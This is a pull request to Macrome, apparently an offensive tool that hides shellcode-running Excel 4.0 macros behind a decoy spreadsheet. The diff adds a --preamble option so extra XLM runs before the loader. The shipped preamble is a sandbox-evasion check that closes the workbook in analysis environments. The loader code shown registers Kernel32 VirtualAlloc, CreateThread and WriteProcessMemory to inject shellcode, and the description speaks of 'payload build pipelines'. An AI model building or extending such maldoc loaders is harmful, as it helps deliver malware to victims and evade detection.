### PR TITLE
More flexibilty with shellcode execution

### DIFF
--- a/Docs/preamble.txt
+++ b/Docs/preamble.txt
@@ -1,0 +1,1 @@
+=ALERT("I'm doing stuff!")

--- a/Docs/preamble.txt
+++ b/Docs/preamble.txt
@@ -1,1 +1,1 @@
-=ALERT("I'm doing stuff!")
+=IF(GET.WORKSPACE(13)<770, CLOSE(FALSE),)

--- a/MacroPatterns.cs
+++ b/MacroPatterns.cs
@@ -5,7 +5,7 @@ namespace Macrome
 {
     public static class MacroPatterns
     {
-        public static List<String> GetBinaryLoaderPattern(string macroSheetName)
+        public static List<String> GetBinaryLoaderPattern(List<string> preamble, string macroSheetName)
         {
             //TODO Autocalculate these values at generation time
             //These variables assume certain positions in generated macros
@@ -25,8 +25,6 @@ namespace Macrome
             //TODO [Functionality] Add support for .NET payloads (https://docs.microsoft.com/en-us/dotnet/core/tutorials/netcore-hosting, https://www.mdsec.co.uk/2020/03/hiding-your-net-etw/)
             List<string> macros = new List<string>()
             {
-                "=IF(GET.WORKSPACE(13)<770, CLOSE(FALSE),)",
-                // "=HALT()",
                 "=REGISTER(\"Kernel32\",\"VirtualAlloc\",\"JJJJJ\",\"VA\",,1,0)",
                 "=REGISTER(\"Kernel32\",\"CreateThread\",\"JJJJJJJ\",\"CT\",,1,0)",
                 "=REGISTER(\"Kernel32\",\"WriteProcessMemory\",\"JJJCJJ\",\"WPM\",,1,0)",
@@ -45,7 +43,11 @@ namespace Macrome
                 "=WAIT(NOW()+\"00:00:03\")",
                 "=HALT()"
             };
-
+            if (preamble.Count > 0)
+            {
+                preamble.AddRange(macros);
+                return preamble;
+            }
             return macros;
         }
 

--- a/Program.cs
+++ b/Program.cs
@@ -72,11 +72,12 @@ namespace Macrome
         /// <param name="decoyDocument">File path to the base Excel 2003 sheet that should be visible to users.</param>
         /// <param name="payload">Either binary shellcode or a newline separated list of Excel Macros to execute</param>
         /// <param name="payloadType">Specify if the payload is binary shellcode or a macro list. Defaults to Shellcode</param>
+        /// <param name="preamble">Preamble macro code to include for either payload type</param>
         /// <param name="macroSheetName">The name that should be used for the macro sheet. Defaults to Sheet2</param>
         /// <param name="outputFileName">The output filename used for the generated document. Defaults to output.xls</param>
         /// <param name="debugMode">Set this to true to make the program wait for a debugger to attach. Defaults to false</param>
         public static void Build(FileInfo decoyDocument, FileInfo payload,
-            PayloadType payloadType = PayloadType.Shellcode,
+            PayloadType payloadType = PayloadType.Shellcode, string preamble="Docs/preamble.txt",
             string macroSheetName = "Sheet2", string outputFileName = "output.xls", bool debugMode = false)
         {
             if (decoyDocument == null || payload == null)
@@ -99,8 +100,10 @@ namespace Macrome
             List<BiffRecord> defaultMacroSheetRecords = GetDefaultMacroSheetRecords();
 
             string decoyDocPath = decoyDocument.FullName;
+            string preambleCodePath = new FileInfo(preamble).FullName;
 
             WorkbookStream wbs = LoadDecoyDocument(decoyDocPath);
+            List<string> preambleCode = new List<string>(File.ReadAllLines(preambleCodePath));
 
             if (wbs.GetAllRecordsByType<SupBook>().Count > 0)
             {
@@ -119,7 +122,7 @@ namespace Macrome
             switch (payloadType)
             {
                 case PayloadType.Shellcode:
-                    macros = MacroPatterns.GetBinaryLoaderPattern(macroSheetName);
+                    macros = MacroPatterns.GetBinaryLoaderPattern(preambleCode, macroSheetName);
                     binaryPayload = File.ReadAllBytes(payload.FullName);
                     break;
                 case PayloadType.Macro:

--- a/Program.cs
+++ b/Program.cs
@@ -72,7 +72,7 @@ namespace Macrome
         /// <param name="decoyDocument">File path to the base Excel 2003 sheet that should be visible to users.</param>
         /// <param name="payload">Either binary shellcode or a newline separated list of Excel Macros to execute</param>
         /// <param name="payloadType">Specify if the payload is binary shellcode or a macro list. Defaults to Shellcode</param>
-        /// <param name="preamble">Preamble macro code to include for either payload type</param>
+        /// <param name="preamble">Preamble macro code to include with binary shellcode payload type</param>
         /// <param name="macroSheetName">The name that should be used for the macro sheet. Defaults to Sheet2</param>
         /// <param name="outputFileName">The output filename used for the generated document. Defaults to output.xls</param>
         /// <param name="debugMode">Set this to true to make the program wait for a debugger to attach. Defaults to false</param>


### PR DESCRIPTION
To incorporate this tool into my payload build pipelines, i wanted more flexibility with the XLM code you define in PayloadType.cs (like if i want to add sandbox checks or some other XLM code to execute before the thread is created). My pull request adds a --preamble flag, which will simple take whatever XLM you define in Docs/preamble.txt and add it in front of the code which creates the thread. 